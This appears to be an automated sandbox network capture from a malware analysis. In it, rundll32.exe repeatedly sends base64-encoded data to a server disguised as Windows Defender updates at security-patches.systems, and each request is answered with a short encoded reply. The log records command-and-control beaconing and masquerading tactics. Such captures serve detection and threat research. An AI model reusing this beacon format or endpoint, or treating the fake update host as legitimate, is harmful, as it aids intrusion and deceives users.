Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49791	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:05.527555943 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:06.976794004 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:06 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49792	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:07.241880894 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:08.678684950 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49793	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:08.944052935 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:10.389496088 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49794	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:10.663183928 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:12.145798922 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49796	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:12.414484978 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:13.873713017 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49797	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:14.133641958 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:15.569931984 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:15 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49798	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:15.960436106 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:17.400242090 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49799	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:17.663589001 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:19.135976076 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:18 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49800	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:19.401577950 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:20.838905096 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:20 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49801	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:21.139069080 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:22.575979948 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:22 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49802	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:22.835859060 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:24.296380043 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49803	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:24.554583073 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
